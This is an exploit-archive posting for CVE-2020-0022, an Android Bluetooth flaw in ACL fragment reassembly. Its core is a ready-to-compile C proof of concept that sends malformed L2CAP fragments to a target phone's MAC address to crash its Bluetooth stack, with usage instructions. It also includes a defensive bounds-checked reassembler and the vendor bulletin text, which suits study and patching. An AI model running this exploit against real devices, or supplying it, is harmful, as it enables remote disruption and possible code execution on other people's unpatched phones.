Android Bluetooth Remote Denial Of Service

Posted Mar 25, 2020
Authored by nu11secur1ty

Android suffers from a bluetooth remote denial of service vulnerability.

tags | exploit, remote, denial of service
advisories | CVE-2020-0022
SHA-256 | 89e5543cb6f51f283e41a489aaa3e084de84be0c84b8090c5910f061d0b501ba

# Exploit Title: Critical Bluetooth Vulnerability in Android (CVE-2020-0022) - Remote DoS
# Author: nu11secur1ty
# Date: 2020-03-24
# Vendor: Android
# Link: https://github.com/nu11secur1ty/Andr01dExploits/tree/master/CVE-2020-0022
# CVE: CVE-2020-0022



[+] Credits: Ventsislav Varbanovski (@ nu11secur1ty)
[+] Website: https://www.nu11secur1ty.com/
[+] Source: readme from GitHUB
[+] twitter.com/nu11secur1ty


[Exploit Program Code]

/*
 * gcc poc.c -o p0c_blue -lbluetooth
 * sudo ./p0c_blue MAC_ADDR
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/l2cap.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>
#include <errno.h>
#include <unistd.h>
#include <sys/uio.h>

int hci_send_acl_data(int hci_socket, uint16_t hci_handle, uint8_t *data,
                      uint16_t data_length, uint16_t PBflag, uint16_t dlen);

int main(int argc, char **argv) {
    bdaddr_t dst_addr;
    if (argc != 2) {
        printf("usage: ./p0c_blue MAC_ADDR\n");
        exit(1);
    }
    str2ba(argv[1], &dst_addr);
    struct hci_dev_info di;

    // Get an HCI socket on the default local adapter
    printf("\nCreating HCI socket...\n");
    int hci_device_id = hci_get_route(NULL);
    int hci_socket = hci_open_dev(hci_device_id);
    if (hci_socket < 0) {
        perror("hci_open_dev");
        exit(1);
    }
    if (hci_devinfo(hci_device_id, &di) < 0) {
        perror("devinfo");
        exit(1);
    }
    uint16_t hci_handle;

    // -------- L2CAP Socket --------
    // local addr
    struct l2cap_conninfo l2_conninfo;
    int l2_sock;
    struct sockaddr_l2 laddr, raddr;
    memset(&laddr, 0, sizeof(laddr));
    laddr.l2_family = AF_BLUETOOTH;
    laddr.l2_bdaddr = di.bdaddr;
    laddr.l2_psm = htobs(0x1001);
    laddr.l2_cid = htobs(0x0040);

    // remote addr
    memset(&raddr, 0, sizeof(raddr));
    raddr.l2_family = AF_BLUETOOTH;
    raddr.l2_bdaddr = dst_addr;

    // create socket
    printf("\nCreating l2cap socket...\n");
    if ((l2_sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0) {
        perror("create l2cap socket");
        exit(1);
    }
    // bind and connect; the established connection yields the ACL handle
    bind(l2_sock, (struct sockaddr *)&laddr, sizeof(laddr));
    if (connect(l2_sock, (struct sockaddr *)&raddr, sizeof(raddr)) < 0) {
        perror("connect");
        exit(1);
    }
    socklen_t l2_conninfolen = sizeof(l2_conninfo);
    getsockopt(l2_sock, SOL_L2CAP, L2CAP_CONNINFO, &l2_conninfo,
               &l2_conninfolen);
    hci_handle = l2_conninfo.hci_handle;
    printf("hci handle: %d\n", hci_handle);

    // -------- L2CAP Socket --------

    // HCI Connect
    printf("\nCreating a HCI BLE connection...\n");
    printf("\nPrepare to send packet\n");
    uint16_t datalen = 33;                      // L2CAP length field
    uint16_t _bs_l2cap_len = htobs(datalen);
    uint16_t _bs_cid = htobs(0x0001);           // L2CAP CID
    uint8_t packet[4 + datalen + 0x1000];
    memcpy(&packet[0], &_bs_l2cap_len, 2);
    memcpy(&packet[2], &_bs_cid, 2);
    memset(&packet[4], 0x99, datalen + 0x1000);
    int fl = 36;
    int i = 0;
    // first fragment: PB flag 0x2 marks the start of an L2CAP PDU
    hci_send_acl_data(hci_socket, hci_handle, &packet[i], fl, 0x2, fl);
    i += fl;
    printf("\nSent first packet\n");
    // continuation fragment: PB flag 0x1
    hci_send_acl_data(hci_socket, hci_handle, &packet[i], 300, 0x1, 300);

    printf("\nClosing HCI socket...\n");
    close(hci_socket);
    printf("\nClosing l2cap socket...\n");
    close(l2_sock);
    return 0;
}

int hci_send_acl_data(int hci_socket, uint16_t hci_handle, uint8_t *data,
                      uint16_t data_length, uint16_t PBflag, uint16_t dlen) {
    uint8_t type = HCI_ACLDATA_PKT;
    uint16_t BCflag = 0x0000;                   // Broadcast flag
    //uint16_t PBflag = 0x0002;                 // Packet Boundary flag
    uint16_t flags = ((BCflag << 2) | PBflag) & 0x000F;
    hci_acl_hdr hd;
    hd.handle = htobs(acl_handle_pack(hci_handle, flags));
    //hd.dlen = (data_length);
    hd.dlen = htobs(dlen);                      // ACL data total length (little-endian)
    struct iovec iv[3];
    int ivn = 3;

    iv[0].iov_base = &type;                     // packet type indicator
    iv[0].iov_len = 1;                          // size of the type byte
    iv[1].iov_base = &hd;                       // ACL header: handle + flags, data length
    iv[1].iov_len = HCI_ACL_HDR_SIZE;
    iv[2].iov_base = data;                      // L2CAP header + data
    iv[2].iov_len = data_length;                // bytes actually written after the header

    while (writev(hci_socket, iv, ivn) < 0) {
        if (errno == EAGAIN || errno == EINTR)
            continue;
        perror("writev");
        return -1;
    }
    return 0;
}


[Video]
https://www.youtube.com/watch?v=9C0bz-GiVUI


[Vulnerability Type]
Remote DoS


[CVE Reference]
In reassemble_and_dispatch of packet_fragmenter.cc, there is a possible out
of bounds write due to an incorrect bounds calculation. This could lead to
remote code execution over Bluetooth with no additional execution privileges
needed. User interaction is not needed for exploitation.
Product: Android
Versions: Android-8.0 Android-8.1 Android-9 Android-10
Android ID: A-143894715
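The CVE text attributes the fault to a bounds calculation during ACL fragment reassembly. The PoC above relies on exactly that: its first ACL fragment announces a 33-byte L2CAP PDU but carries only 32 payload bytes, and the 300-byte continuation that follows is far larger than the single byte still outstanding. The example below is added here for illustration and is neither the PoC author's code nor the AOSP reassemble_and_dispatch implementation; it shows the check a defensively written reassembler must make, namely bounding every continuation fragment by the remaining length of the PDU announced in the first fragment (expected minus received) rather than by the raw buffer size. The fragment layout follows the HCI ACL data packet format (12-bit handle, 2-bit PB flag, 2-bit BC flag, then a 16-bit data length, all little-endian); the MAX_L2CAP_PDU cap, the status values and the demo inputs are constructed for this example.

```c
/* Added example: a bounds-checked HCI ACL -> L2CAP reassembler. Not AOSP code.
 * Assumed wire layout per ACL packet: [handle|PB|BC (2 bytes LE)] [data length (2 bytes LE)] [payload].
 * The first fragment's payload begins with the L2CAP basic header: length (2 bytes LE), CID (2 bytes LE). */
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define PB_FIRST_FLUSHABLE 0x2   /* start of a new L2CAP PDU */
#define PB_CONTINUATION    0x1   /* continuing fragment */
#define L2CAP_HDR          4
#define MAX_L2CAP_PDU      1024  /* constructed cap for this example */

enum reasm_status { REASM_NEED_MORE = 0, REASM_COMPLETE = 1, REASM_REJECT = -1 };

struct reasm {
    uint8_t buf[L2CAP_HDR + MAX_L2CAP_PDU];
    size_t expected;   /* L2CAP header + announced L2CAP length, fixed by the first fragment */
    size_t received;   /* bytes copied so far */
    int active;        /* a PDU is in progress */
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }

/* Feed one complete ACL packet (header + payload). */
int reasm_feed(struct reasm *r, const uint8_t *pkt, size_t pkt_len) {
    if (pkt_len < 4) return REASM_REJECT;
    unsigned pb = (rd16(pkt) >> 12) & 0x3;
    size_t dlen = rd16(pkt + 2);
    if (dlen != pkt_len - 4) return REASM_REJECT;      /* declared length must match what arrived */
    const uint8_t *payload = pkt + 4;

    if (pb == PB_FIRST_FLUSHABLE || pb == 0x0) {       /* new PDU: read the L2CAP length */
        if (dlen < L2CAP_HDR) return REASM_REJECT;
        size_t l2len = rd16(payload);
        if (l2len > MAX_L2CAP_PDU) return REASM_REJECT;
        r->expected = L2CAP_HDR + l2len;
        r->received = 0;
        r->active = 1;
    } else if (pb == PB_CONTINUATION) {
        if (!r->active) return REASM_REJECT;           /* continuation without a first fragment */
    } else {
        return REASM_REJECT;
    }
    /* The essential check: capacity is what the announced PDU still needs, not the buffer size. */
    if (dlen > r->expected - r->received) { r->active = 0; return REASM_REJECT; }
    memcpy(r->buf + r->received, payload, dlen);
    r->received += dlen;
    if (r->received == r->expected) { r->active = 0; return REASM_COMPLETE; }
    return REASM_NEED_MORE;
}

/* Build an ACL packet into out (caller sizes out for 4 + len bytes); returns total length. */
static size_t make_acl(uint8_t *out, uint16_t handle, unsigned pb,
                       const uint8_t *payload, size_t len) {
    uint16_t hf = (uint16_t)((handle & 0x0FFF) | ((pb & 0x3) << 12));
    out[0] = (uint8_t)(hf & 0xFF);
    out[1] = (uint8_t)(hf >> 8);
    out[2] = (uint8_t)(len & 0xFF);
    out[3] = (uint8_t)((len >> 8) & 0xFF);
    memcpy(out + 4, payload, len);
    return 4 + len;
}

/* Replays the shape of the PoC's two writes (constructed input): first fragment announces
 * L2CAP length 33 with 32 payload bytes, then a 300-byte continuation. Returns the second status. */
int demo_poc_pattern(void) {
    struct reasm r; memset(&r, 0, sizeof r);
    uint8_t payload[300]; memset(payload, 0x99, sizeof payload);
    payload[0] = 33; payload[1] = 0; payload[2] = 1; payload[3] = 0;   /* len 33, CID 0x0001 */
    uint8_t pkt[4 + 300];
    size_t n = make_acl(pkt, 0x0040, PB_FIRST_FLUSHABLE, payload, 36);
    if (reasm_feed(&r, pkt, n) != REASM_NEED_MORE) return 99;
    memset(payload, 0x99, sizeof payload);
    n = make_acl(pkt, 0x0040, PB_CONTINUATION, payload, 300);
    return reasm_feed(&r, pkt, n);                      /* REASM_REJECT: only 1 byte outstanding */
}

/* A well-formed PDU split over two fragments (constructed input) still completes. */
int demo_valid_two_fragments(void) {
    struct reasm r; memset(&r, 0, sizeof r);
    uint8_t first[9] = {8, 0, 0x40, 0x00, 'a', 'b', 'c', 'd', 'e'};   /* len 8, CID 0x0040, 5 of 8 */
    uint8_t rest[3] = {'f', 'g', 'h'};
    uint8_t pkt[4 + 9];
    size_t n = make_acl(pkt, 0x0040, PB_FIRST_FLUSHABLE, first, sizeof first);
    if (reasm_feed(&r, pkt, n) != REASM_NEED_MORE) return 99;
    n = make_acl(pkt, 0x0040, PB_CONTINUATION, rest, sizeof rest);
    return reasm_feed(&r, pkt, n);                      /* REASM_COMPLETE */
}
```

The point of the example is the single comparison against `expected - received`: once the first fragment fixes the PDU size, no later fragment can legitimately carry more than what is still missing, so an oversized continuation is dropped before any copy happens. A reassembler that instead compares against its buffer size, or trusts the continuation's own length field, is the class of defect the CVE description names.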


[Security Issue]
The Android Security Bulletin contains details of security vulnerabilities
affecting Android devices. Security patch levels of 2020-02-05 or later
address all of these issues. To learn how to check a device's security
patch level, see Check and update your Android version.
Android partners are notified of all issues at least a month before
publication. Source code patches for these issues have been released to the
Android Open Source Project (AOSP) repository and linked from this
bulletin. This bulletin also includes links to patches outside of AOSP.
The most severe of these issues is a critical security vulnerability in the
System component that could enable a remote attacker using a specially
crafted transmission to execute arbitrary code within the context of a
privileged process. The severity assessment is based on the effect that
exploiting the vulnerability would possibly have on an affected device,
assuming the platform and service mitigations are turned off for
development purposes or if successfully bypassed.
Refer to the Android and Google Play Protect mitigations section for
details on the Android security platform protections and Google Play
Protect, which improve the security of the Android platform.



[Disclosure Timeline]
Published February 3, 2020 | Updated February 5, 2020


[+] Disclaimer
Disclaimer: The entry creation date may reflect when the CVE ID was allocated
or reserved, and does not necessarily indicate when this vulnerability was
discovered, shared with the affected vendor, publicly disclosed, or updated in
CVE.

FIX:

- Fix on OS 10

CVE            References    Type   Severity   Updated AOSP versions
--------------------------------------------------------------------
CVE-2020-0022  A-143894715   DoS    Moderate   10

- Table source: https://source.android.com/security/bulletin/2020-02-01


@nu11secur1ty